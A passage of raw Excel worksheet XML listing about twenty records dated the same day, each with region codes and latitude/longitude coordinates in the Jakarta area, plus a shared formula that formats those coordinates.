        <v>-631740</v>
      </c>
      <c r="X3421" t="s">
        <v>21268</v>
      </c>
      <c r="Y3421" t="str">
        <f t="shared" si="53"/>
        <v>-6.31740,106.99046</v>
      </c>
    </row>
    <row r="3422" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3422">
        <v>261858</v>
      </c>
      <c r="B3422" s="1">
        <v>44247</v>
      </c>
      <c r="C3422" s="2">
        <v>0.33828703703703705</v>
      </c>
      <c r="D3422" t="s">
        <v>22</v>
      </c>
      <c r="E3422" t="s">
        <v>23</v>
      </c>
      <c r="F3422" t="s">
        <v>11382</v>
      </c>
      <c r="G3422" t="s">
        <v>11383</v>
      </c>
      <c r="H3422" t="s">
        <v>26</v>
      </c>
      <c r="I3422" t="s">
        <v>2165</v>
      </c>
      <c r="J3422" t="s">
        <v>2627</v>
      </c>
      <c r="L3422" t="s">
        <v>11384</v>
      </c>
      <c r="M3422">
        <v>3275030004</v>
      </c>
      <c r="N3422">
        <v>3275030</v>
      </c>
      <c r="O3422">
        <v>3275</v>
      </c>
      <c r="P3422">
        <v>32</v>
      </c>
      <c r="Q3422" t="s">
        <v>11385</v>
      </c>
      <c r="R3422" t="s">
        <v>11385</v>
      </c>
      <c r="S3422" t="s">
        <v>41</v>
      </c>
      <c r="T3422" t="s">
        <v>42</v>
      </c>
      <c r="U3422" s="5">
        <v>10699188</v>
      </c>
      <c r="V3422" s="5" t="s">
        <v>17533</v>
      </c>
      <c r="W3422" s="5">
        <v>-631382</v>
      </c>
      <c r="X3422" t="s">
        <v>21269</v>
      </c>
      <c r="Y3422" t="str">
        <f t="shared" si="53"/>
        <v>-6.31382,106.99188</v>
      </c>
    </row>
    <row r="3423" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3423">
        <v>261859</v>
      </c>
      <c r="B3423" s="1">
        <v>44247</v>
      </c>
      <c r="C3423" s="2">
        <v>0.33953703703703703</v>
      </c>
      <c r="D3423" t="s">
        <v>22</v>
      </c>
      <c r="E3423" t="s">
        <v>23</v>
      </c>
      <c r="F3423" t="s">
        <v>11386</v>
      </c>
      <c r="H3423" t="s">
        <v>26</v>
      </c>
      <c r="I3423" t="s">
        <v>1389</v>
      </c>
      <c r="J3423" t="s">
        <v>11367</v>
      </c>
      <c r="L3423" t="s">
        <v>11387</v>
      </c>
      <c r="M3423">
        <v>3174020006</v>
      </c>
      <c r="N3423">
        <v>3174020</v>
      </c>
      <c r="O3423">
        <v>3174</v>
      </c>
      <c r="P3423">
        <v>31</v>
      </c>
      <c r="Q3423" t="s">
        <v>427</v>
      </c>
      <c r="R3423" t="s">
        <v>31</v>
      </c>
      <c r="S3423" t="s">
        <v>32</v>
      </c>
      <c r="T3423" t="s">
        <v>33</v>
      </c>
      <c r="U3423" s="5">
        <v>10676459</v>
      </c>
      <c r="V3423" s="5" t="s">
        <v>17534</v>
      </c>
      <c r="W3423" s="5">
        <v>-618933</v>
      </c>
      <c r="X3423" t="s">
        <v>21270</v>
      </c>
      <c r="Y3423" t="str">
        <f t="shared" si="53"/>
        <v>-6.18933,106.76459</v>
      </c>
    </row>
    <row r="3424" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3424">
        <v>261934</v>
      </c>
      <c r="B3424" s="1">
        <v>44247</v>
      </c>
      <c r="C3424" s="2">
        <v>0.29434027777777777</v>
      </c>
      <c r="D3424" t="s">
        <v>85</v>
      </c>
      <c r="E3424" t="s">
        <v>23</v>
      </c>
      <c r="F3424" t="s">
        <v>11388</v>
      </c>
      <c r="G3424" t="s">
        <v>11389</v>
      </c>
      <c r="H3424" t="s">
        <v>26</v>
      </c>
      <c r="J3424" t="s">
        <v>1458</v>
      </c>
      <c r="K3424" t="s">
        <v>11390</v>
      </c>
      <c r="L3424" t="s">
        <v>11391</v>
      </c>
      <c r="M3424">
        <v>3172050005</v>
      </c>
      <c r="N3424">
        <v>3172050</v>
      </c>
      <c r="O3424">
        <v>3172</v>
      </c>
      <c r="P3424">
        <v>31</v>
      </c>
      <c r="Q3424" t="s">
        <v>358</v>
      </c>
      <c r="R3424" t="s">
        <v>358</v>
      </c>
      <c r="S3424" t="s">
        <v>49</v>
      </c>
      <c r="T3424" t="s">
        <v>33</v>
      </c>
      <c r="U3424" s="5">
        <v>10687282</v>
      </c>
      <c r="V3424" s="5" t="s">
        <v>17535</v>
      </c>
      <c r="W3424" s="5">
        <v>-627433</v>
      </c>
      <c r="X3424" t="s">
        <v>21271</v>
      </c>
      <c r="Y3424" t="str">
        <f t="shared" si="53"/>
        <v>-6.27433,106.87282</v>
      </c>
    </row>
    <row r="3425" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3425">
        <v>261935</v>
      </c>
      <c r="B3425" s="1">
        <v>44247</v>
      </c>
      <c r="C3425" s="2">
        <v>0.3460300925925926</v>
      </c>
      <c r="D3425" t="s">
        <v>22</v>
      </c>
      <c r="E3425" t="s">
        <v>23</v>
      </c>
      <c r="F3425" t="s">
        <v>11392</v>
      </c>
      <c r="H3425" t="s">
        <v>26</v>
      </c>
      <c r="I3425" t="s">
        <v>197</v>
      </c>
      <c r="J3425" t="s">
        <v>2627</v>
      </c>
      <c r="L3425" t="s">
        <v>11393</v>
      </c>
      <c r="M3425">
        <v>3275012002</v>
      </c>
      <c r="N3425">
        <v>3275012</v>
      </c>
      <c r="O3425">
        <v>3275</v>
      </c>
      <c r="P3425">
        <v>32</v>
      </c>
      <c r="Q3425" t="s">
        <v>4208</v>
      </c>
      <c r="R3425" t="s">
        <v>4089</v>
      </c>
      <c r="S3425" t="s">
        <v>41</v>
      </c>
      <c r="T3425" t="s">
        <v>42</v>
      </c>
      <c r="U3425" s="5">
        <v>10693489</v>
      </c>
      <c r="V3425" s="5" t="s">
        <v>17536</v>
      </c>
      <c r="W3425" s="5">
        <v>-631615</v>
      </c>
      <c r="X3425" t="s">
        <v>21272</v>
      </c>
      <c r="Y3425" t="str">
        <f t="shared" si="53"/>
        <v>-6.31615,106.93489</v>
      </c>
    </row>
    <row r="3426" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3426">
        <v>261937</v>
      </c>
      <c r="B3426" s="1">
        <v>44247</v>
      </c>
      <c r="C3426" s="2">
        <v>0.34513888888888888</v>
      </c>
      <c r="D3426" t="s">
        <v>2648</v>
      </c>
      <c r="E3426" t="s">
        <v>23</v>
      </c>
      <c r="G3426" t="s">
        <v>11394</v>
      </c>
      <c r="H3426" t="s">
        <v>26</v>
      </c>
      <c r="J3426" t="s">
        <v>2627</v>
      </c>
      <c r="L3426" t="s">
        <v>11395</v>
      </c>
      <c r="M3426">
        <v>3216081010</v>
      </c>
      <c r="N3426">
        <v>3216081</v>
      </c>
      <c r="O3426">
        <v>3216</v>
      </c>
      <c r="P3426">
        <v>32</v>
      </c>
      <c r="Q3426" t="s">
        <v>6132</v>
      </c>
      <c r="R3426" t="s">
        <v>2512</v>
      </c>
      <c r="S3426" t="s">
        <v>41</v>
      </c>
      <c r="T3426" t="s">
        <v>42</v>
      </c>
      <c r="U3426" s="5">
        <v>10707830</v>
      </c>
      <c r="V3426" s="5" t="s">
        <v>17537</v>
      </c>
      <c r="W3426" s="5">
        <v>-620267</v>
      </c>
      <c r="X3426" t="s">
        <v>21273</v>
      </c>
      <c r="Y3426" t="str">
        <f t="shared" si="53"/>
        <v>-6.20267,107.07830</v>
      </c>
    </row>
    <row r="3427" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3427">
        <v>261947</v>
      </c>
      <c r="B3427" s="1">
        <v>44247</v>
      </c>
      <c r="C3427" s="2">
        <v>0.34652777777777777</v>
      </c>
      <c r="D3427" t="s">
        <v>2648</v>
      </c>
      <c r="E3427" t="s">
        <v>23</v>
      </c>
      <c r="G3427" t="s">
        <v>11396</v>
      </c>
      <c r="H3427" t="s">
        <v>26</v>
      </c>
      <c r="J3427" t="s">
        <v>2627</v>
      </c>
      <c r="L3427" t="s">
        <v>11397</v>
      </c>
      <c r="M3427">
        <v>3216081010</v>
      </c>
      <c r="N3427">
        <v>3216081</v>
      </c>
      <c r="O3427">
        <v>3216</v>
      </c>
      <c r="P3427">
        <v>32</v>
      </c>
      <c r="Q3427" t="s">
        <v>6132</v>
      </c>
      <c r="R3427" t="s">
        <v>2512</v>
      </c>
      <c r="S3427" t="s">
        <v>41</v>
      </c>
      <c r="T3427" t="s">
        <v>42</v>
      </c>
      <c r="U3427" s="5">
        <v>10707830</v>
      </c>
      <c r="V3427" s="5" t="s">
        <v>17537</v>
      </c>
      <c r="W3427" s="5">
        <v>-620252</v>
      </c>
      <c r="X3427" t="s">
        <v>21274</v>
      </c>
      <c r="Y3427" t="str">
        <f t="shared" si="53"/>
        <v>-6.20252,107.07830</v>
      </c>
    </row>
    <row r="3428" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3428">
        <v>262014</v>
      </c>
      <c r="B3428" s="1">
        <v>44247</v>
      </c>
      <c r="C3428" s="2">
        <v>0.35281249999999997</v>
      </c>
      <c r="D3428" t="s">
        <v>22</v>
      </c>
      <c r="E3428" t="s">
        <v>23</v>
      </c>
      <c r="F3428" t="s">
        <v>11398</v>
      </c>
      <c r="G3428" t="s">
        <v>11399</v>
      </c>
      <c r="H3428" t="s">
        <v>26</v>
      </c>
      <c r="I3428" t="s">
        <v>1809</v>
      </c>
      <c r="J3428" t="s">
        <v>2627</v>
      </c>
      <c r="M3428">
        <v>3216111001</v>
      </c>
      <c r="N3428">
        <v>3216111</v>
      </c>
      <c r="O3428">
        <v>3216</v>
      </c>
      <c r="P3428">
        <v>32</v>
      </c>
      <c r="Q3428" t="s">
        <v>10029</v>
      </c>
      <c r="R3428" t="s">
        <v>10030</v>
      </c>
      <c r="S3428" t="s">
        <v>41</v>
      </c>
      <c r="T3428" t="s">
        <v>42</v>
      </c>
      <c r="U3428" s="5">
        <v>10704887</v>
      </c>
      <c r="V3428" s="5" t="s">
        <v>17538</v>
      </c>
      <c r="W3428" s="5">
        <v>-615744</v>
      </c>
      <c r="X3428" t="s">
        <v>21275</v>
      </c>
      <c r="Y3428" t="str">
        <f t="shared" si="53"/>
        <v>-6.15744,107.04887</v>
      </c>
    </row>
    <row r="3429" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3429">
        <v>262015</v>
      </c>
      <c r="B3429" s="1">
        <v>44247</v>
      </c>
      <c r="C3429" s="2">
        <v>0.35332175925925924</v>
      </c>
      <c r="D3429" t="s">
        <v>22</v>
      </c>
      <c r="E3429" t="s">
        <v>23</v>
      </c>
      <c r="F3429" t="s">
        <v>11400</v>
      </c>
      <c r="G3429" t="s">
        <v>11401</v>
      </c>
      <c r="H3429" t="s">
        <v>26</v>
      </c>
      <c r="I3429" t="s">
        <v>11190</v>
      </c>
      <c r="J3429" t="s">
        <v>11402</v>
      </c>
      <c r="M3429">
        <v>3171070004</v>
      </c>
      <c r="N3429">
        <v>3171070</v>
      </c>
      <c r="O3429">
        <v>3171</v>
      </c>
      <c r="P3429">
        <v>31</v>
      </c>
      <c r="Q3429" t="s">
        <v>121</v>
      </c>
      <c r="R3429" t="s">
        <v>121</v>
      </c>
      <c r="S3429" t="s">
        <v>108</v>
      </c>
      <c r="T3429" t="s">
        <v>33</v>
      </c>
      <c r="U3429" s="5">
        <v>10682323</v>
      </c>
      <c r="V3429" s="5" t="s">
        <v>17539</v>
      </c>
      <c r="W3429" s="5">
        <v>-624198</v>
      </c>
      <c r="X3429" t="s">
        <v>21276</v>
      </c>
      <c r="Y3429" t="str">
        <f t="shared" si="53"/>
        <v>-6.24198,106.82323</v>
      </c>
    </row>
    <row r="3430" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3430">
        <v>262034</v>
      </c>
      <c r="B3430" s="1">
        <v>44247</v>
      </c>
      <c r="C3430" s="2">
        <v>0.3520833333333333</v>
      </c>
      <c r="D3430" t="s">
        <v>2648</v>
      </c>
      <c r="E3430" t="s">
        <v>23</v>
      </c>
      <c r="G3430" t="s">
        <v>11403</v>
      </c>
      <c r="H3430" t="s">
        <v>26</v>
      </c>
      <c r="J3430" t="s">
        <v>2627</v>
      </c>
      <c r="L3430" t="s">
        <v>11404</v>
      </c>
      <c r="M3430">
        <v>3216081010</v>
      </c>
      <c r="N3430">
        <v>3216081</v>
      </c>
      <c r="O3430">
        <v>3216</v>
      </c>
      <c r="P3430">
        <v>32</v>
      </c>
      <c r="Q3430" t="s">
        <v>6132</v>
      </c>
      <c r="R3430" t="s">
        <v>2512</v>
      </c>
      <c r="S3430" t="s">
        <v>41</v>
      </c>
      <c r="T3430" t="s">
        <v>42</v>
      </c>
      <c r="U3430" s="5">
        <v>10707966</v>
      </c>
      <c r="V3430" s="5" t="s">
        <v>17540</v>
      </c>
      <c r="W3430" s="5">
        <v>-620533</v>
      </c>
      <c r="X3430" t="s">
        <v>21277</v>
      </c>
      <c r="Y3430" t="str">
        <f t="shared" si="53"/>
        <v>-6.20533,107.07966</v>
      </c>
    </row>
    <row r="3431" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3431">
        <v>262056</v>
      </c>
      <c r="B3431" s="1">
        <v>44247</v>
      </c>
      <c r="C3431" s="2">
        <v>0.35622685185185188</v>
      </c>
      <c r="D3431" t="s">
        <v>22</v>
      </c>
      <c r="E3431" t="s">
        <v>23</v>
      </c>
      <c r="F3431" t="s">
        <v>11405</v>
      </c>
      <c r="G3431" t="s">
        <v>11406</v>
      </c>
      <c r="H3431" t="s">
        <v>26</v>
      </c>
      <c r="I3431" t="s">
        <v>11407</v>
      </c>
      <c r="J3431" t="s">
        <v>4487</v>
      </c>
      <c r="L3431" t="s">
        <v>11408</v>
      </c>
      <c r="M3431">
        <v>3171070001</v>
      </c>
      <c r="N3431">
        <v>3171070</v>
      </c>
      <c r="O3431">
        <v>3171</v>
      </c>
      <c r="P3431">
        <v>31</v>
      </c>
      <c r="Q3431" t="s">
        <v>120</v>
      </c>
      <c r="R3431" t="s">
        <v>121</v>
      </c>
      <c r="S3431" t="s">
        <v>108</v>
      </c>
      <c r="T3431" t="s">
        <v>33</v>
      </c>
      <c r="U3431" s="5">
        <v>10682398</v>
      </c>
      <c r="V3431" s="5" t="s">
        <v>17541</v>
      </c>
      <c r="W3431" s="5">
        <v>-625489</v>
      </c>
      <c r="X3431" t="s">
        <v>21278</v>
      </c>
      <c r="Y3431" t="str">
        <f t="shared" si="53"/>
        <v>-6.25489,106.82398</v>
      </c>
    </row>
    <row r="3432" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3432">
        <v>262097</v>
      </c>
      <c r="B3432" s="1">
        <v>44247</v>
      </c>
      <c r="C3432" s="2">
        <v>0.36013888888888884</v>
      </c>
      <c r="D3432" t="s">
        <v>22</v>
      </c>
      <c r="E3432" t="s">
        <v>23</v>
      </c>
      <c r="F3432" t="s">
        <v>11409</v>
      </c>
      <c r="G3432" t="s">
        <v>11410</v>
      </c>
      <c r="H3432" t="s">
        <v>26</v>
      </c>
      <c r="I3432" t="s">
        <v>2073</v>
      </c>
      <c r="J3432" t="s">
        <v>11411</v>
      </c>
      <c r="L3432" t="s">
        <v>250</v>
      </c>
      <c r="M3432">
        <v>3171030001</v>
      </c>
      <c r="N3432">
        <v>3171030</v>
      </c>
      <c r="O3432">
        <v>3171</v>
      </c>
      <c r="P3432">
        <v>31</v>
      </c>
      <c r="Q3432" t="s">
        <v>363</v>
      </c>
      <c r="R3432" t="s">
        <v>364</v>
      </c>
      <c r="S3432" t="s">
        <v>108</v>
      </c>
      <c r="T3432" t="s">
        <v>33</v>
      </c>
      <c r="U3432" s="5">
        <v>10677131</v>
      </c>
      <c r="V3432" s="5" t="s">
        <v>17542</v>
      </c>
      <c r="W3432" s="5">
        <v>-628975</v>
      </c>
      <c r="X3432" t="s">
        <v>21279</v>
      </c>
      <c r="Y3432" t="str">
        <f t="shared" si="53"/>
        <v>-6.28975,106.77131</v>
      </c>
    </row>
    <row r="3433" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3433">
        <v>262098</v>
      </c>
      <c r="B3433" s="1">
        <v>44247</v>
      </c>
      <c r="C3433" s="2">
        <v>0.36002314814814818</v>
      </c>
      <c r="D3433" t="s">
        <v>22</v>
      </c>
      <c r="E3433" t="s">
        <v>23</v>
      </c>
      <c r="F3433" t="s">
        <v>11412</v>
      </c>
      <c r="G3433" t="s">
        <v>11413</v>
      </c>
      <c r="H3433" t="s">
        <v>26</v>
      </c>
      <c r="I3433" t="s">
        <v>3716</v>
      </c>
      <c r="J3433" t="s">
        <v>3675</v>
      </c>
      <c r="L3433" t="s">
        <v>11414</v>
      </c>
      <c r="M3433">
        <v>3171080003</v>
      </c>
      <c r="N3433">
        <v>3171080</v>
      </c>
      <c r="O3433">
        <v>3171</v>
      </c>
      <c r="P3433">
        <v>31</v>
      </c>
      <c r="Q3433" t="s">
        <v>3677</v>
      </c>
      <c r="R3433" t="s">
        <v>1403</v>
      </c>
      <c r="S3433" t="s">
        <v>108</v>
      </c>
      <c r="T3433" t="s">
        <v>33</v>
      </c>
      <c r="U3433" s="5">
        <v>10682674</v>
      </c>
      <c r="V3433" s="5" t="s">
        <v>14486</v>
      </c>
      <c r="W3433" s="5">
        <v>-625946</v>
      </c>
      <c r="X3433" t="s">
        <v>21280</v>
      </c>
      <c r="Y3433" t="str">
        <f t="shared" si="53"/>
        <v>-6.25946,106.82674</v>
      </c>
    </row>
    <row r="3434" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3434">
        <v>262299</v>
      </c>
      <c r="B3434" s="1">
        <v>44247</v>
      </c>
      <c r="C3434" s="2">
        <v>0.35944444444444446</v>
      </c>
      <c r="D3434" t="s">
        <v>85</v>
      </c>
      <c r="E3434" t="s">
        <v>23</v>
      </c>
      <c r="F3434" t="s">
        <v>11415</v>
      </c>
      <c r="G3434" t="s">
        <v>11416</v>
      </c>
      <c r="H3434" t="s">
        <v>26</v>
      </c>
      <c r="J3434" t="s">
        <v>2627</v>
      </c>
      <c r="K3434" t="s">
        <v>11417</v>
      </c>
      <c r="L3434" t="s">
        <v>11418</v>
      </c>
      <c r="M3434">
        <v>3215031005</v>
      </c>
      <c r="N3434">
        <v>3215031</v>
      </c>
      <c r="O3434">
        <v>3215</v>
      </c>
      <c r="P3434">
        <v>32</v>
      </c>
      <c r="Q3434" t="s">
        <v>11419</v>
      </c>
      <c r="R3434" t="s">
        <v>11003</v>
      </c>
      <c r="S3434" t="s">
        <v>3979</v>
      </c>
      <c r="T3434" t="s">
        <v>42</v>
      </c>
      <c r="U3434" s="5">
        <v>10728604</v>
      </c>
      <c r="V3434" s="5" t="s">
        <v>17543</v>
      </c>
      <c r="W3434" s="5">
        <v>-633007</v>
      </c>
      <c r="X3434" t="s">
        <v>21281</v>
      </c>
      <c r="Y3434" t="str">
        <f t="shared" si="53"/>
        <v>-6.33007,107.28604</v>
      </c>
    </row>
    <row r="3435" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3435">
        <v>262301</v>
      </c>
      <c r="B3435" s="1">
        <v>44247</v>
      </c>
      <c r="C3435" s="2">
        <v>0.37917824074074075</v>
      </c>
      <c r="D3435" t="s">
        <v>22</v>
      </c>
      <c r="E3435" t="s">
        <v>23</v>
      </c>
      <c r="F3435" t="s">
        <v>11420</v>
      </c>
      <c r="H3435" t="s">
        <v>26</v>
      </c>
      <c r="I3435" t="s">
        <v>80</v>
      </c>
      <c r="J3435" t="s">
        <v>3135</v>
      </c>
      <c r="L3435" t="s">
        <v>11421</v>
      </c>
      <c r="M3435">
        <v>3671021007</v>
      </c>
      <c r="N3435">
        <v>3671021</v>
      </c>
      <c r="O3435">
        <v>3671</v>
      </c>
      <c r="P3435">
        <v>36</v>
      </c>
      <c r="Q3435" t="s">
        <v>454</v>
      </c>
      <c r="R3435" t="s">
        <v>454</v>
      </c>
      <c r="S3435" t="s">
        <v>201</v>
      </c>
      <c r="T3435" t="s">
        <v>171</v>
      </c>
      <c r="U3435" s="5">
        <v>10669510</v>
      </c>
      <c r="V3435" s="5" t="s">
        <v>17544</v>
      </c>
      <c r="W3435" s="5">
        <v>-621353</v>
      </c>
      <c r="X3435" t="s">
        <v>21282</v>
      </c>
      <c r="Y3435" t="str">
        <f t="shared" si="53"/>
        <v>-6.21353,106.69510</v>
      </c>
    </row>
    <row r="3436" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3436">
        <v>262302</v>
      </c>
      <c r="B3436" s="1">
        <v>44247</v>
      </c>
      <c r="C3436" s="2">
        <v>0.37708333333333338</v>
      </c>
      <c r="D3436" t="s">
        <v>2648</v>
      </c>
      <c r="E3436" t="s">
        <v>23</v>
      </c>
      <c r="G3436" t="s">
        <v>11422</v>
      </c>
      <c r="H3436" t="s">
        <v>26</v>
      </c>
      <c r="J3436" t="s">
        <v>1471</v>
      </c>
      <c r="L3436" t="s">
        <v>11423</v>
      </c>
      <c r="M3436">
        <v>3171100001</v>
      </c>
      <c r="N3436">
        <v>3171100</v>
      </c>
      <c r="O3436">
        <v>3171</v>
      </c>
      <c r="P3436">
        <v>31</v>
      </c>
      <c r="Q3436" t="s">
        <v>1474</v>
      </c>
      <c r="R3436" t="s">
        <v>107</v>
      </c>
      <c r="S3436" t="s">
        <v>108</v>
      </c>
      <c r="T3436" t="s">
        <v>33</v>
      </c>
      <c r="U3436" s="5">
        <v>10681700</v>
      </c>
      <c r="V3436" s="5" t="s">
        <v>17545</v>
      </c>
      <c r="W3436" s="5">
        <v>-621906</v>
      </c>
      <c r="X3436" t="s">
        <v>21283</v>
      </c>
      <c r="Y3436" t="str">
        <f t="shared" si="53"/>
        <v>-6.21906,106.81700</v>
      </c>
    </row>
    <row r="3437" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3437">
        <v>262343</v>
      </c>
      <c r="B3437" s="1">
        <v>44247</v>
      </c>
      <c r="C3437" s="2">
        <v>0.38200231481481484</v>
      </c>
      <c r="D3437" t="s">
        <v>22</v>
      </c>
      <c r="E3437" t="s">
        <v>23</v>
      </c>
      <c r="F3437" t="s">
        <v>11424</v>
      </c>
      <c r="G3437" t="s">
        <v>11425</v>
      </c>
      <c r="H3437" t="s">
        <v>26</v>
      </c>
      <c r="I3437" t="s">
        <v>9045</v>
      </c>
      <c r="J3437" t="s">
        <v>3135</v>
      </c>
      <c r="L3437" t="s">
        <v>11426</v>
      </c>
      <c r="M3437">
        <v>3671010001</v>
      </c>
      <c r="N3437">
        <v>3671010</v>
      </c>
      <c r="O3437">
        <v>3671</v>
      </c>
      <c r="P3437">
        <v>36</v>
      </c>
      <c r="Q3437" t="s">
        <v>4656</v>
      </c>
      <c r="R3437" t="s">
        <v>200</v>
      </c>
      <c r="S3437" t="s">
        <v>201</v>
      </c>
      <c r="T3437" t="s">
        <v>171</v>
      </c>
      <c r="U3437" s="5">
        <v>10668762</v>
      </c>
      <c r="V3437" s="5" t="s">
        <v>17437</v>
      </c>
      <c r="W3437" s="5">
        <v>-623775</v>
      </c>
      <c r="X3437" t="s">
        <v>19528</v>
      </c>
      <c r="Y3437" t="str">
        <f t="shared" si="53"/>
        <v>-6.23775,106.68762</v>
      </c>
    </row>
    <row r="3438" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3438">
        <v>262504</v>
      </c>
      <c r="B3438" s="1">
        <v>44247</v>
      </c>
      <c r="C3438" s="2">
        <v>0.39479166666666665</v>
      </c>
      <c r="D3438" t="s">
        <v>22</v>
      </c>
      <c r="E3438" t="s">
        <v>23</v>
      </c>
      <c r="F3438" t="s">
        <v>11427</v>
      </c>
      <c r="H3438" t="s">
        <v>26</v>
      </c>
      <c r="I3438" t="s">
        <v>9346</v>
      </c>
      <c r="J3438" t="s">
        <v>249</v>
      </c>
      <c r="L3438" t="s">
        <v>11428</v>
      </c>
      <c r="M3438">
        <v>3174010005</v>
      </c>
      <c r="N3438">
        <v>3174010</v>
      </c>
      <c r="O3438">
        <v>3174</v>
      </c>
      <c r="P3438">
        <v>31</v>
      </c>
      <c r="Q3438" t="s">
        <v>251</v>
      </c>
      <c r="R3438" t="s">
        <v>69</v>
      </c>
      <c r="S3438" t="s">
        <v>32</v>
      </c>
      <c r="T3438" t="s">
        <v>33</v>
      </c>
      <c r="U3438" s="5">
        <v>10675354</v>
      </c>
      <c r="V3438" s="5" t="s">
        <v>17546</v>
      </c>
      <c r="W3438" s="5">
        <v>-618483</v>
      </c>
      <c r="X3438" t="s">
        <v>21284</v>
      </c>
      <c r="Y3438" t="str">
        <f t="shared" si="53"/>
        <v>-6.18483,106.75354</v>
      </c>
    </row>
    <row r="3439" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3439">
        <v>262545</v>
      </c>
      <c r="B3439" s="1">
        <v>44247</v>
      </c>
      <c r="C3439" s="2">
        <v>0.37116898148148153</v>
      </c>
      <c r="D3439" t="s">
        <v>85</v>
      </c>
      <c r="E3439" t="s">
        <v>23</v>
      </c>
      <c r="F3439" t="s">
        <v>11429</v>
      </c>
      <c r="G3439" t="s">
        <v>11430</v>
      </c>
      <c r="H3439" t="s">
        <v>26</v>
      </c>
      <c r="I3439" t="s">
        <v>608</v>
      </c>
      <c r="J3439" t="s">
        <v>2627</v>
      </c>
      <c r="K3439" t="s">
        <v>11431</v>
      </c>
      <c r="L3439" t="s">
        <v>11432</v>
      </c>
      <c r="M3439">
        <v>3276040012</v>
      </c>
      <c r="N3439">
        <v>3276040</v>
      </c>
      <c r="O3439">
        <v>3276</v>
      </c>
      <c r="P3439">
        <v>32</v>
      </c>
      <c r="Q3439" t="s">
        <v>6553</v>
      </c>
      <c r="R3439" t="s">
        <v>1821</v>
      </c>
      <c r="S3439" t="s">
        <v>185</v>
      </c>
      <c r="T3439" t="s">
        <v>42</v>
      </c>
      <c r="U3439" s="5">
        <v>10685022</v>
      </c>
      <c r="V3439" s="5" t="s">
        <v>17547</v>
      </c>
      <c r="W3439" s="5">
        <v>-636542</v>
      </c>
      <c r="X3439" t="s">
        <v>21285</v>
      </c>
      <c r="Y3439" t="str">
        <f t="shared" si="53"/>
        <v>-6.36542,106.85022</v>
      </c>
    </row>
    <row r="3440" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3440">
        <v>262547</v>
      </c>
      <c r="B3440" s="1">
        <v>44247</v>
      </c>
      <c r="C3440" s="2">
        <v>0.3994328703703704</v>
      </c>
      <c r="D3440" t="s">
        <v>22</v>
      </c>
      <c r="E3440" t="s">
        <v>23</v>
      </c>
      <c r="F3440" t="s">
        <v>11433</v>
      </c>
      <c r="G3440" t="s">
        <v>11434</v>
      </c>
      <c r="H3440" t="s">
        <v>26</v>
      </c>
      <c r="I3440" t="s">
        <v>2442</v>
      </c>
      <c r="J3440" t="s">
        <v>5777</v>
      </c>
      <c r="M3440">
        <v>3171020007</v>
      </c>
      <c r="N3440">
        <v>3171020</v>
      </c>
      <c r="O3440">
        <v>3171</v>
      </c>
      <c r="P3440">
        <v>31</v>
      </c>
      <c r="Q3440" t="s">
        <v>5778</v>
      </c>
      <c r="R3440" t="s">
        <v>484</v>
      </c>
      <c r="S3440" t="s">
        <v>108</v>
      </c>
      <c r="T3440" t="s">
        <v>33</v>
      </c>
      <c r="U3440" s="5">
        <v>10685047</v>
      </c>
      <c r="V3440" s="5" t="s">
        <v>17548</v>
      </c>
      <c r="W3440" s="5">
        <v>-627354</v>
      </c>
      <c r="X3440" t="s">
        <v>21286</v>
      </c>
      <c r="Y3440" t="str">
        <f t="shared" si="53"/>
        <v>-6.27354,106.85047</v>
      </c>
    </row>
    <row r="3441" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3441">
        <v>262668</v>
      </c>
      <c r="B3441" s="1">
        <v>44247</v>
      </c>
      <c r="C3441" s="2">
        <v>0.40956018518518517</v>
      </c>
      <c r="D3441" t="s">
        <v>22</v>
      </c>
      <c r="E3441" t="s">
        <v>23</v>
      </c>
      <c r="F3441" t="s">
        <v>11435</v>
      </c>
      <c r="G3441" t="s">
        <v>11436</v>
      </c>
      <c r="H3441" t="s">
        <v>26</v>
      </c>
      <c r="I3441" t="s">
        <v>5188</v>
      </c>
      <c r="J3441" t="s">
        <v>3135</v>
      </c>
      <c r="L3441" t="s">
        <v>11437</v>
      </c>
      <c r="M3441">
        <v>3671020015</v>
      </c>
      <c r="N3441">
        <v>3671020</v>
      </c>
      <c r="O3441">
        <v>3671</v>
      </c>
      <c r="P3441">
        <v>36</v>
      </c>
      <c r="Q3441" t="s">
        <v>11438</v>
      </c>
      <c r="R3441" t="s">
        <v>274</v>
      </c>
      <c r="S3441" t="s">
        <v>201</v>
      </c>
      <c r="T3441" t="s">
        <v>171</v>
      </c>
      <c r="U3441" s="5">
        <v>10669822</v>
      </c>
      <c r="V3441" s="5" t="s">
        <v>17549</v>
      </c>
      <c r="W3441" s="5">
        <v>-620114</v>
      </c>
      <c r="X3441" t="s">
        <v>21287</v>
      </c>
      <c r="Y3441" t="str">
        <f t="shared" si="53"/>
        <v>-6.20114,106.69822</v>
      </c>
    </row>
    <row r="3442" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3442">
        <v>262669</v>
      </c>
      <c r="B3442" s="1">
        <v>44247</v>
      </c>
      <c r="C3442" s="2">
        <v>0.41043981481481479</v>
      </c>
      <c r="D3442" t="s">
        <v>22</v>
      </c>
      <c r="E3442" t="s">
        <v>23</v>
      </c>
      <c r="F3442" t="s">
        <v>11439</v>
      </c>
      <c r="G3442" t="s">
        <v>11440</v>
      </c>
      <c r="H3442" t="s">
        <v>26</v>
      </c>
      <c r="I3442" t="s">
        <v>10636</v>
      </c>
      <c r="J3442" t="s">
        <v>3135</v>
      </c>
      <c r="L3442" t="s">
        <v>11441</v>
      </c>
      <c r="M3442">
        <v>3671012001</v>
      </c>
      <c r="N3442">
        <v>3671012</v>
